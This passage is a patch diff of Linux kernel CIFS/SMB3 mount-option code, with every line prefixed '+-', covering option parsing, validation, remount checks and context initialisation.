+-		 * we have encountered a double deliminator reset the NULL
+-		 * character to the deliminator
+-		 */
+-		while (options && options[0] == ',') {
+-			len = strlen(key);
+-			strcpy(key + len, options);
+-			options = strchr(options, ',');
+-			if (options)
+-				*options++ = 0;
+-		}
+-
+-
+-		len = 0;
+-		value = strchr(key, '=');
+-		if (value) {
+-			if (value == key)
+-				continue;
+-			*value++ = 0;
+-			len = strlen(value);
+-		}
+-
+-		ret = vfs_parse_fs_string(fc, key, value, len);
+-		if (ret < 0)
+-			break;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Validate the preparsed information in the config.
+- */
+-static int smb3_fs_context_validate(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-
+-	if (ctx->rdma && ctx->vals->protocol_id < SMB30_PROT_ID) {
+-		cifs_errorf(fc, "SMB Direct requires Version >=3.0\n");
+-		return -EOPNOTSUPP;
+-	}
+-
+-#ifndef CONFIG_KEYS
+-	/* Muliuser mounts require CONFIG_KEYS support */
+-	if (ctx->multiuser) {
+-		cifs_errorf(fc, "Multiuser mounts require kernels with CONFIG_KEYS enabled\n");
+-		return -1;
+-	}
+-#endif
+-
+-	if (ctx->got_version == false)
+-		pr_warn_once("No dialect specified on mount. Default has changed to a more secure dialect, SMB2.1 or later (e.g. SMB3.1.1), from CIFS (SMB1). To use the less secure SMB1 dialect to access old servers which do not support SMB3.1.1 (or even SMB3 or SMB2.1) specify vers=1.0 on mount.\n");
+-
+-
+-	if (!ctx->UNC) {
+-		cifs_errorf(fc, "CIFS mount error: No usable UNC path provided in device string!\n");
+-		return -1;
+-	}
+-
+-	/* make sure UNC has a share name */
+-	if (strlen(ctx->UNC) < 3 || !strchr(ctx->UNC + 3, '\\')) {
+-		cifs_errorf(fc, "Malformed UNC. Unable to find share name.\n");
+-		return -ENOENT;
+-	}
+-
+-	if (!ctx->got_ip) {
+-		int len;
+-		const char *slash;
+-
+-		/* No ip= option specified? Try to get it from UNC */
+-		/* Use the address part of the UNC. */
+-		slash = strchr(&ctx->UNC[2], '\\');
+-		len = slash - &ctx->UNC[2];
+-		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
+-					  &ctx->UNC[2], len)) {
+-			pr_err("Unable to determine destination address\n");
+-			return -EHOSTUNREACH;
+-		}
+-	}
+-
+-	/* set the port that we got earlier */
+-	cifs_set_port((struct sockaddr *)&ctx->dstaddr, ctx->port);
+-
+-	if (ctx->override_uid && !ctx->uid_specified) {
+-		ctx->override_uid = 0;
+-		pr_notice("ignoring forceuid mount option specified with no uid= option\n");
+-	}
+-
+-	if (ctx->override_gid && !ctx->gid_specified) {
+-		ctx->override_gid = 0;
+-		pr_notice("ignoring forcegid mount option specified with no gid= option\n");
+-	}
+-
+-	return 0;
+-}
+-
+-static int smb3_get_tree_common(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	struct dentry *root;
+-	int rc = 0;
+-
+-	root = cifs_smb3_do_mount(fc->fs_type, 0, ctx);
+-	if (IS_ERR(root))
+-		return PTR_ERR(root);
+-
+-	fc->root = root;
+-
+-	return rc;
+-}
+-
+-/*
+- * Create an SMB3 superblock from the parameters passed.
+- */
+-static int smb3_get_tree(struct fs_context *fc)
+-{
+-	int err = smb3_fs_context_validate(fc);
+-	int ret;
+-
+-	if (err)
+-		return err;
+-	mutex_lock(&cifs_mount_mutex);
+-	ret = smb3_get_tree_common(fc);
+-	mutex_unlock(&cifs_mount_mutex);
+-	return ret;
+-}
+-
+-static void smb3_fs_context_free(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-
+-	smb3_cleanup_fs_context(ctx);
+-}
+-
+-/*
+- * Compare the old and new proposed context during reconfigure
+- * and check if the changes are compatible.
+- */
+-static int smb3_verify_reconfigure_ctx(struct fs_context *fc,
+-				       struct smb3_fs_context *new_ctx,
+-				       struct smb3_fs_context *old_ctx)
+-{
+-	if (new_ctx->posix_paths != old_ctx->posix_paths) {
+-		cifs_errorf(fc, "can not change posixpaths during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->sectype != old_ctx->sectype) {
+-		cifs_errorf(fc, "can not change sec during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->multiuser != old_ctx->multiuser) {
+-		cifs_errorf(fc, "can not change multiuser during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->UNC &&
+-	    (!old_ctx->UNC || strcmp(new_ctx->UNC, old_ctx->UNC))) {
+-		cifs_errorf(fc, "can not change UNC during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->username &&
+-	    (!old_ctx->username || strcmp(new_ctx->username, old_ctx->username))) {
+-		cifs_errorf(fc, "can not change username during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->password &&
+-	    (!old_ctx->password || strcmp(new_ctx->password, old_ctx->password))) {
+-		cifs_errorf(fc, "can not change password during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->domainname &&
+-	    (!old_ctx->domainname || strcmp(new_ctx->domainname, old_ctx->domainname))) {
+-		cifs_errorf(fc, "can not change domainname during remount\n");
+-		return -EINVAL;
+-	}
+-	if (strcmp(new_ctx->workstation_name, old_ctx->workstation_name)) {
+-		cifs_errorf(fc, "can not change workstation_name during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->nodename &&
+-	    (!old_ctx->nodename || strcmp(new_ctx->nodename, old_ctx->nodename))) {
+-		cifs_errorf(fc, "can not change nodename during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->iocharset &&
+-	    (!old_ctx->iocharset || strcmp(new_ctx->iocharset, old_ctx->iocharset))) {
+-		cifs_errorf(fc, "can not change iocharset during remount\n");
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-#define STEAL_STRING(cifs_sb, ctx, field)				\
+-do {									\
+-	kfree(ctx->field);						\
+-	ctx->field = cifs_sb->ctx->field;				\
+-	cifs_sb->ctx->field = NULL;					\
+-} while (0)
+-
+-#define STEAL_STRING_SENSITIVE(cifs_sb, ctx, field)			\
+-do {									\
+-	kfree_sensitive(ctx->field);					\
+-	ctx->field = cifs_sb->ctx->field;				\
+-	cifs_sb->ctx->field = NULL;					\
+-} while (0)
+-
+-static int smb3_reconfigure(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	struct dentry *root = fc->root;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
+-	int rc;
+-
+-	rc = smb3_verify_reconfigure_ctx(fc, ctx, cifs_sb->ctx);
+-	if (rc)
+-		return rc;
+-
+-	/*
+-	 * We can not change UNC/username/password/domainname/
+-	 * workstation_name/nodename/iocharset
+-	 * during reconnect so ignore what we have in the new context and
+-	 * just use what we already have in cifs_sb->ctx.
+-	 */
+-	STEAL_STRING(cifs_sb, ctx, UNC);
+-	STEAL_STRING(cifs_sb, ctx, source);
+-	STEAL_STRING(cifs_sb, ctx, username);
+-	STEAL_STRING_SENSITIVE(cifs_sb, ctx, password);
+-	STEAL_STRING(cifs_sb, ctx, domainname);
+-	STEAL_STRING(cifs_sb, ctx, nodename);
+-	STEAL_STRING(cifs_sb, ctx, iocharset);
+-
+-	/* if rsize or wsize not passed in on remount, use previous values */
+-	if (ctx->rsize == 0)
+-		ctx->rsize = cifs_sb->ctx->rsize;
+-	if (ctx->wsize == 0)
+-		ctx->wsize = cifs_sb->ctx->wsize;
+-
+-
+-	smb3_cleanup_fs_context_contents(cifs_sb->ctx);
+-	rc = smb3_fs_context_dup(cifs_sb->ctx, ctx);
+-	smb3_update_mnt_flags(cifs_sb);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	if (!rc)
+-		rc = dfs_cache_remount_fs(cifs_sb);
+-#endif
+-
+-	return rc;
+-}
+-
+-static int smb3_fs_context_parse_param(struct fs_context *fc,
+-				      struct fs_parameter *param)
+-{
+-	struct fs_parse_result result;
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	int i, opt;
+-	bool is_smb3 = !strcmp(fc->fs_type->name, "smb3");
+-	bool skip_parsing = false;
+-	kuid_t uid;
+-	kgid_t gid;
+-
+-	cifs_dbg(FYI, "CIFS: parsing cifs mount option '%s'\n", param->key);
+-
+-	/*
+-	 * fs_parse can not handle string options with an empty value so
+-	 * we will need special handling of them.
+-	 */
+-	if (param->type == fs_value_is_string && param->string[0] == 0) {
+-		if (!strcmp("pass", param->key) || !strcmp("password", param->key)) {
+-			skip_parsing = true;
+-			opt = Opt_pass;
+-		} else if (!strcmp("user", param->key) || !strcmp("username", param->key)) {
+-			skip_parsing = true;
+-			opt = Opt_user;
+-		}
+-	}
+-
+-	if (!skip_parsing) {
+-		opt = fs_parse(fc, smb3_fs_parameters, param, &result);
+-		if (opt < 0)
+-			return ctx->sloppy ? 1 : opt;
+-	}
+-
+-	switch (opt) {
+-	case Opt_compress:
+-		ctx->compression = UNKNOWN_TYPE;
+-		cifs_dbg(VFS,
+-			"SMB3 compression support is experimental\n");
+-		break;
+-	case Opt_nodfs:
+-		ctx->nodfs = 1;
+-		break;
+-	case Opt_hard:
+-		if (result.negated)
+-			ctx->retry = 0;
+-		else
+-			ctx->retry = 1;
+-		break;
+-	case Opt_soft:
+-		if (result.negated)
+-			ctx->retry = 1;
+-		else
+-			ctx->retry = 0;
+-		break;
+-	case Opt_mapposix:
+-		if (result.negated)
+-			ctx->remap = false;
+-		else {
+-			ctx->remap = true;
+-			ctx->sfu_remap = false; /* disable SFU mapping */
+-		}
+-		break;
+-	case Opt_mapchars:
+-		if (result.negated)
+-			ctx->sfu_remap = false;
+-		else {
+-			ctx->sfu_remap = true;
+-			ctx->remap = false; /* disable SFM (mapposix) mapping */
+-		}
+-		break;
+-	case Opt_user_xattr:
+-		if (result.negated)
+-			ctx->no_xattr = 1;
+-		else
+-			ctx->no_xattr = 0;
+-		break;
+-	case Opt_forceuid:
+-		if (result.negated)
+-			ctx->override_uid = 0;
+-		else
+-			ctx->override_uid = 1;
+-		break;
+-	case Opt_forcegid:
+-		if (result.negated)
+-			ctx->override_gid = 0;
+-		else
+-			ctx->override_gid = 1;
+-		break;
+-	case Opt_perm:
+-		if (result.negated)
+-			ctx->noperm = 1;
+-		else
+-			ctx->noperm = 0;
+-		break;
+-	case Opt_dynperm:
+-		if (result.negated)
+-			ctx->dynperm = 0;
+-		else
+-			ctx->dynperm = 1;
+-		break;
+-	case Opt_sfu:
+-		if (result.negated)
+-			ctx->sfu_emul = 0;
+-		else
+-			ctx->sfu_emul = 1;
+-		break;
+-	case Opt_noblocksend:
+-		ctx->noblocksnd = 1;
+-		break;
+-	case Opt_noautotune:
+-		ctx->noautotune = 1;
+-		break;
+-	case Opt_nolease:
+-		ctx->no_lease = 1;
+-		break;
+-	case Opt_nosparse:
+-		ctx->no_sparse = 1;
+-		break;
+-	case Opt_nodelete:
+-		ctx->nodelete = 1;
+-		break;
+-	case Opt_multichannel:
+-		if (result.negated) {
+-			ctx->multichannel = false;
+-			ctx->max_channels = 1;
+-		} else {
+-			ctx->multichannel = true;
+-			/* if number of channels not specified, default to 2 */
+-			if (ctx->max_channels < 2)
+-				ctx->max_channels = 2;
+-		}
+-		break;
+-	case Opt_uid:
+-		uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(uid))
+-			goto cifs_parse_mount_err;
+-		ctx->linux_uid = uid;
+-		ctx->uid_specified = true;
+-		break;
+-	case Opt_cruid:
+-		uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(uid))
+-			goto cifs_parse_mount_err;
+-		ctx->cred_uid = uid;
+-		ctx->cruid_specified = true;
+-		break;
+-	case Opt_backupuid:
+-		uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(uid))
+-			goto cifs_parse_mount_err;
+-		ctx->backupuid = uid;
+-		ctx->backupuid_specified = true;
+-		break;
+-	case Opt_backupgid:
+-		gid = make_kgid(current_user_ns(), result.uint_32);
+-		if (!gid_valid(gid))
+-			goto cifs_parse_mount_err;
+-		ctx->backupgid = gid;
+-		ctx->backupgid_specified = true;
+-		break;
+-	case Opt_gid:
+-		gid = make_kgid(current_user_ns(), result.uint_32);
+-		if (!gid_valid(gid))
+-			goto cifs_parse_mount_err;
+-		ctx->linux_gid = gid;
+-		ctx->gid_specified = true;
+-		break;
+-	case Opt_port:
+-		ctx->port = result.uint_32;
+-		break;
+-	case Opt_file_mode:
+-		ctx->file_mode = result.uint_32;
+-		break;
+-	case Opt_dirmode:
+-		ctx->dir_mode = result.uint_32;
+-		break;
+-	case Opt_min_enc_offload:
+-		ctx->min_offload = result.uint_32;
+-		break;
+-	case Opt_blocksize:
+-		/*
+-		 * inode blocksize realistically should never need to be
+-		 * less than 16K or greater than 16M and default is 1MB.
+-		 * Note that small inode block sizes (e.g. 64K) can lead
+-		 * to very poor performance of common tools like cp and scp
+-		 */
+-		if ((result.uint_32 < CIFS_MAX_MSGSIZE) ||
+-		   (result.uint_32 > (4 * SMB3_DEFAULT_IOSIZE))) {
+-			cifs_errorf(fc, "%s: Invalid blocksize\n",
+-				__func__);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->bsize = result.uint_32;
+-		ctx->got_bsize = true;
+-		break;
+-	case Opt_rasize:
+-		/*
+-		 * readahead size realistically should never need to be
+-		 * less than 1M (CIFS_DEFAULT_IOSIZE) or greater than 32M
+-		 * (perhaps an exception should be considered in the
+-		 * for the case of a large number of channels
+-		 * when multichannel is negotiated) since that would lead
+-		 * to plenty of parallel I/O in flight to the server.
+-		 * Note that smaller read ahead sizes would
+-		 * hurt performance of common tools like cp and scp
+-		 * which often trigger sequential i/o with read ahead
+-		 */
+-		if ((result.uint_32 > (8 * SMB3_DEFAULT_IOSIZE)) ||
+-		    (result.uint_32 < CIFS_DEFAULT_IOSIZE)) {
+-			cifs_errorf(fc, "%s: Invalid rasize %d vs. %d\n",
+-				__func__, result.uint_32, SMB3_DEFAULT_IOSIZE);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->rasize = result.uint_32;
+-		break;
+-	case Opt_rsize:
+-		ctx->rsize = result.uint_32;
+-		ctx->got_rsize = true;
+-		break;
+-	case Opt_wsize:
+-		ctx->wsize = result.uint_32;
+-		ctx->got_wsize = true;
+-		break;
+-	case Opt_acregmax:
+-		ctx->acregmax = HZ * result.uint_32;
+-		if (ctx->acregmax > CIFS_MAX_ACTIMEO) {
+-			cifs_errorf(fc, "acregmax too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_acdirmax:
+-		ctx->acdirmax = HZ * result.uint_32;
+-		if (ctx->acdirmax > CIFS_MAX_ACTIMEO) {
+-			cifs_errorf(fc, "acdirmax too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_actimeo:
+-		if (HZ * result.uint_32 > CIFS_MAX_ACTIMEO) {
+-			cifs_errorf(fc, "timeout too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		if ((ctx->acdirmax != CIFS_DEF_ACTIMEO) ||
+-		    (ctx->acregmax != CIFS_DEF_ACTIMEO)) {
+-			cifs_errorf(fc, "actimeo ignored since acregmax or acdirmax specified\n");
+-			break;
+-		}
+-		ctx->acdirmax = ctx->acregmax = HZ * result.uint_32;
+-		break;
+-	case Opt_closetimeo:
+-		ctx->closetimeo = HZ * result.uint_32;
+-		if (ctx->closetimeo > SMB3_MAX_DCLOSETIMEO) {
+-			cifs_errorf(fc, "closetimeo too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_echo_interval:
+-		ctx->echo_interval = result.uint_32;
+-		break;
+-	case Opt_snapshot:
+-		ctx->snapshot_time = result.uint_64;
+-		break;
+-	case Opt_max_credits:
+-		if (result.uint_32 < 20 || result.uint_32 > 60000) {
+-			cifs_errorf(fc, "%s: Invalid max_credits value\n",
+-				 __func__);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->max_credits = result.uint_32;
+-		break;
+-	case Opt_max_channels:
+-		if (result.uint_32 < 1 || result.uint_32 > CIFS_MAX_CHANNELS) {
+-			cifs_errorf(fc, "%s: Invalid max_channels value, needs to be 1-%d\n",
+-				 __func__, CIFS_MAX_CHANNELS);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->max_channels = result.uint_32;
+-		/* If more than one channel requested ... they want multichan */
+-		if (result.uint_32 > 1)
+-			ctx->multichannel = true;
+-		break;
+-	case Opt_handletimeout:
+-		ctx->handle_timeout = result.uint_32;
+-		if (ctx->handle_timeout > SMB3_MAX_HANDLE_TIMEOUT) {
+-			cifs_errorf(fc, "Invalid handle cache timeout, longer than 16 minutes\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_source:
+-		kfree(ctx->UNC);
+-		ctx->UNC = NULL;
+-		switch (smb3_parse_devname(param->string, ctx)) {
+-		case 0:
+-			break;
+-		case -ENOMEM:
+-			cifs_errorf(fc, "Unable to allocate memory for devname\n");
+-			goto cifs_parse_mount_err;
+-		case -EINVAL:
+-			cifs_errorf(fc, "Malformed UNC in devname\n");
+-			goto cifs_parse_mount_err;
+-		default:
+-			cifs_errorf(fc, "Unknown error parsing devname\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->source = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->source == NULL) {
+-			cifs_errorf(fc, "OOM when copying UNC string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		fc->source = kstrdup(param->string, GFP_KERNEL);
+-		if (fc->source == NULL) {
+-			cifs_errorf(fc, "OOM when copying UNC string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_user:
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-		if (strlen(param->string) == 0) {
+-			/* null user, ie. anonymous authentication */
+-			ctx->nullauth = 1;
+-			break;
+-		}
+-
+-		if (strnlen(param->string, CIFS_MAX_USERNAME_LEN) >
+-		    CIFS_MAX_USERNAME_LEN) {
+-			pr_warn("username too long\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->username = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->username == NULL) {
+-			cifs_errorf(fc, "OOM when copying username string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_pass:
+-		kfree_sensitive(ctx->password);
+-		ctx->password = NULL;
+-		if (strlen(param->string) == 0)
+-			break;
+-
+-		ctx->password = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->password == NULL) {
+-			cifs_errorf(fc, "OOM when copying password string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_ip:
+-		if (strlen(param->string) == 0) {
+-			ctx->got_ip = false;
+-			break;
+-		}
+-		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
+-					  param->string,
+-					  strlen(param->string))) {
+-			pr_err("bad ip= option (%s)\n", param->string);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->got_ip = true;
+-		break;
+-	case Opt_domain:
+-		if (strnlen(param->string, CIFS_MAX_DOMAINNAME_LEN)
+-				== CIFS_MAX_DOMAINNAME_LEN) {
+-			pr_warn("domain name too long\n");
+-			goto cifs_parse_mount_err;
+-		}
+-
+-		kfree(ctx->domainname);
+-		ctx->domainname = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->domainname == NULL) {
+-			cifs_errorf(fc, "OOM when copying domainname string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		cifs_dbg(FYI, "Domain name set\n");
+-		break;
+-	case Opt_srcaddr:
+-		if (!cifs_convert_address(
+-				(struct sockaddr *)&ctx->srcaddr,
+-				param->string, strlen(param->string))) {
+-			pr_warn("Could not parse srcaddr: %s\n",
+-				param->string);
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_iocharset:
+-		if (strnlen(param->string, 1024) >= 65) {
+-			pr_warn("iocharset name too long\n");
+-			goto cifs_parse_mount_err;
+-		}
+-
+-		if (strncasecmp(param->string, "default", 7) != 0) {
+-			kfree(ctx->iocharset);
+-			ctx->iocharset = kstrdup(param->string, GFP_KERNEL);
+-			if (ctx->iocharset == NULL) {
+-				cifs_errorf(fc, "OOM when copying iocharset string\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		}
+-		/* if iocharset not set then load_nls_default
+-		 * is used by caller
+-		 */
+-		cifs_dbg(FYI, "iocharset set to %s\n", ctx->iocharset);
+-		break;
+-	case Opt_netbiosname:
+-		memset(ctx->source_rfc1001_name, 0x20,
+-			RFC1001_NAME_LEN);
+-		/*
+-		 * FIXME: are there cases in which a comma can
+-		 * be valid in workstation netbios name (and
+-		 * need special handling)?
+-		 */
+-		for (i = 0; i < RFC1001_NAME_LEN; i++) {
+-			/* don't ucase netbiosname for user */
+-			if (param->string[i] == 0)
+-				break;
+-			ctx->source_rfc1001_name[i] = param->string[i];
+-		}
+-		/* The string has 16th byte zero still from
+-		 * set at top of the function
+-		 */
+-		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
+-			pr_warn("netbiosname longer than 15 truncated\n");
+-		break;
+-	case Opt_servern:
+-		/* last byte, type, is 0x20 for servr type */
+-		memset(ctx->target_rfc1001_name, 0x20,
+-			RFC1001_NAME_LEN_WITH_NULL);
+-		/*
+-		 * BB are there cases in which a comma can be valid in this
+-		 * workstation netbios name (and need special handling)?
+-		 */
+-
+-		/* user or mount helper must uppercase the netbios name */
+-		for (i = 0; i < 15; i++) {
+-			if (param->string[i] == 0)
+-				break;
+-			ctx->target_rfc1001_name[i] = param->string[i];
+-		}
+-
+-		/* The string has 16th byte zero still from set at top of function */
+-		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
+-			pr_warn("server netbiosname longer than 15 truncated\n");
+-		break;
+-	case Opt_ver:
+-		/* version of mount userspace tools, not dialect */
+-		/* If interface changes in mount.cifs bump to new ver */
+-		if (strncasecmp(param->string, "1", 1) == 0) {
+-			if (strlen(param->string) > 1) {
+-				pr_warn("Bad mount helper ver=%s. Did you want SMB1 (CIFS) dialect and mean to type vers=1.0 instead?\n",
+-					param->string);
+-				goto cifs_parse_mount_err;
+-			}
+-			/* This is the default */
+-			break;
+-		}
+-		/* For all other value, error */
+-		pr_warn("Invalid mount helper version specified\n");
+-		goto cifs_parse_mount_err;
+-	case Opt_vers:
+-		/* protocol version (dialect) */
+-		if (cifs_parse_smb_version(fc, param->string, ctx, is_smb3) != 0)
+-			goto cifs_parse_mount_err;
+-		ctx->got_version = true;
+-		break;
+-	case Opt_sec:
+-		if (cifs_parse_security_flavors(fc, param->string, ctx) != 0)
+-			goto cifs_parse_mount_err;
+-		break;
+-	case Opt_cache:
+-		if (cifs_parse_cache_flavor(fc, param->string, ctx) != 0)
+-			goto cifs_parse_mount_err;
+-		break;
+-	case Opt_witness:
+-#ifndef CONFIG_CIFS_SWN_UPCALL
+-		cifs_errorf(fc, "Witness support needs CONFIG_CIFS_SWN_UPCALL config option\n");
+-			goto cifs_parse_mount_err;
+-#endif
+-		ctx->witness = true;
+-		pr_warn_once("Witness protocol support is experimental\n");
+-		break;
+-	case Opt_rootfs:
+-#ifndef CONFIG_CIFS_ROOT
+-		cifs_dbg(VFS, "rootfs support requires CONFIG_CIFS_ROOT config option\n");
+-		goto cifs_parse_mount_err;
+-#endif
+-		ctx->rootfs = true;
+-		break;
+-	case Opt_posixpaths:
+-		if (result.negated)
+-			ctx->posix_paths = 0;
+-		else
+-			ctx->posix_paths = 1;
+-		break;
+-	case Opt_unix:
+-		if (result.negated) {
+-			if (ctx->linux_ext == 1)
+-				pr_warn_once("conflicting posix mount options specified\n");
+-			ctx->linux_ext = 0;
+-			ctx->no_linux_ext = 1;
+-		} else {
+-			if (ctx->no_linux_ext == 1)
+-				pr_warn_once("conflicting posix mount options specified\n");
+-			ctx->linux_ext = 1;
+-			ctx->no_linux_ext = 0;
+-		}
+-		break;
+-	case Opt_nocase:
+-		ctx->nocase = 1;
+-		break;
+-	case Opt_brl:
+-		if (result.negated) {
+-			/*
+-			 * turn off mandatory locking in mode
+-			 * if remote locking is turned off since the
+-			 * local vfs will do advisory
+-			 */
+-			if (ctx->file_mode ==
+-				(S_IALLUGO & ~(S_ISUID | S_IXGRP)))
+-				ctx->file_mode = S_IALLUGO;
+-			ctx->nobrl =  1;
+-		} else
+-			ctx->nobrl =  0;
+-		break;
+-	case Opt_handlecache:
+-		if (result.negated)
+-			ctx->nohandlecache = 1;
+-		else
+-			ctx->nohandlecache = 0;
+-		break;
+-	case Opt_forcemandatorylock:
+-		ctx->mand_lock = 1;
+-		break;
+-	case Opt_setuids:
+-		ctx->setuids = result.negated;
+-		break;
+-	case Opt_intr:
+-		ctx->intr = !result.negated;
+-		break;
+-	case Opt_setuidfromacl:
+-		ctx->setuidfromacl = 1;
+-		break;
+-	case Opt_strictsync:
+-		ctx->nostrictsync = result.negated;
+-		break;
+-	case Opt_serverino:
+-		ctx->server_ino = !result.negated;
+-		break;
+-	case Opt_rwpidforward:
+-		ctx->rwpidforward = 1;
+-		break;
+-	case Opt_modesid:
+-		ctx->mode_ace = 1;
+-		break;
+-	case Opt_cifsacl:
+-		ctx->cifs_acl = !result.negated;
+-		break;
+-	case Opt_acl:
+-		ctx->no_psx_acl = result.negated;
+-		break;
+-	case Opt_locallease:
+-		ctx->local_lease = 1;
+-		break;
+-	case Opt_sign:
+-		ctx->sign = true;
+-		break;
+-	case Opt_ignore_signature:
+-		ctx->sign = true;
+-		ctx->ignore_signature = true;
+-		break;
+-	case Opt_seal:
+-		/* we do not do the following in secFlags because seal
+-		 * is a per tree connection (mount) not a per socket
+-		 * or per-smb connection option in the protocol
+-		 * vol->secFlg |= CIFSSEC_MUST_SEAL;
+-		 */
+-		ctx->seal = 1;
+-		break;
+-	case Opt_noac:
+-		pr_warn("Mount option noac not supported. Instead set /proc/fs/cifs/LookupCacheEnabled to 0\n");
+-		break;
+-	case Opt_fsc:
+-#ifndef CONFIG_CIFS_FSCACHE
+-		cifs_errorf(fc, "FS-Cache support needs CONFIG_CIFS_FSCACHE kernel config option set\n");
+-		goto cifs_parse_mount_err;
+-#endif
+-		ctx->fsc = true;
+-		break;
+-	case Opt_mfsymlinks:
+-		ctx->mfsymlinks = true;
+-		break;
+-	case Opt_multiuser:
+-		ctx->multiuser = true;
+-		break;
+-	case Opt_sloppy:
+-		ctx->sloppy = true;
+-		break;
+-	case Opt_nosharesock:
+-		ctx->nosharesock = true;
+-		break;
+-	case Opt_persistent:
+-		if (result.negated) {
+-			ctx->nopersistent = true;
+-			if (ctx->persistent) {
+-				cifs_errorf(fc, "persistenthandles mount options conflict\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		} else {
+-			ctx->persistent = true;
+-			if ((ctx->nopersistent) || (ctx->resilient)) {
+-				cifs_errorf(fc, "persistenthandles mount options conflict\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		}
+-		break;
+-	case Opt_resilient:
+-		if (result.negated) {
+-			ctx->resilient = false; /* already the default */
+-		} else {
+-			ctx->resilient = true;
+-			if (ctx->persistent) {
+-				cifs_errorf(fc, "persistenthandles mount options conflict\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		}
+-		break;
+-	case Opt_tcp_nodelay:
+-		/* tcp nodelay should not usually be needed since we CORK/UNCORK the socket */
+-		if (result.negated)
+-			ctx->sockopt_tcp_nodelay = false;
+-		else
+-			ctx->sockopt_tcp_nodelay = true;
+-		break;
+-	case Opt_domainauto:
+-		ctx->domainauto = true;
+-		break;
+-	case Opt_rdma:
+-		ctx->rdma = true;
+-		break;
+-	}
+-	/* case Opt_ignore: - is ignored as expected ... */
+-
+-	return 0;
+-
+- cifs_parse_mount_err:
+-	kfree_sensitive(ctx->password);
+-	return -EINVAL;
+-}
+-
+-int smb3_init_fs_context(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx;
+-	char *nodename = utsname()->nodename;
+-	int i;
+-
+-	ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
+-	if (unlikely(!ctx))
+-		return -ENOMEM;
+-
+-	strscpy(ctx->workstation_name, nodename, sizeof(ctx->workstation_name));
+-
+-	/*
+-	 * does not have to be perfect mapping since field is
+-	 * informational, only used for servers that do not support
+-	 * port 445 and it can be overridden at mount time
+-	 */
+-	memset(ctx->source_rfc1001_name, 0x20, RFC1001_NAME_LEN);
+-	for (i = 0; i < strnlen(nodename, RFC1001_NAME_LEN); i++)
+-		ctx->source_rfc1001_name[i] = toupper(nodename[i]);
+-
+-	ctx->source_rfc1001_name[RFC1001_NAME_LEN] = 0;
+-	/*
+-	 * null target name indicates to use *SMBSERVR default called name
+-	 *  if we end up sending RFC1001 session initialize
+-	 */
+-	ctx->target_rfc1001_name[0] = 0;
+-	ctx->cred_uid = current_uid();
+-	ctx->linux_uid = current_uid();
+-	ctx->linux_gid = current_gid();
+-	/* By default 4MB read ahead size, 1MB block size */
+-	ctx->bsize = CIFS_DEFAULT_IOSIZE; /* can improve cp performance significantly */
+-	ctx->rasize = 0; /* 0 = use default (ie negotiated rsize) for read ahead pages */
+-
+-	/*
+-	 * default to SFM style remapping of seven reserved characters
+-	 * unless user overrides it or we negotiate CIFS POSIX where
+-	 * it is unnecessary.  Can not simultaneously use more than one mapping
+-	 * since then readdir could list files that open could not open
+-	 */
+-	ctx->remap = true;
+-
+-	/* default to only allowing write access to owner of the mount */
+-	ctx->dir_mode = ctx->file_mode = S_IRUGO | S_IXUGO | S_IWUSR;
+-
+-	/* ctx->retry default is 0 (i.e. "soft" limited retry not hard retry) */
+-	/* default is always to request posix paths. */
+-	ctx->posix_paths = 1;
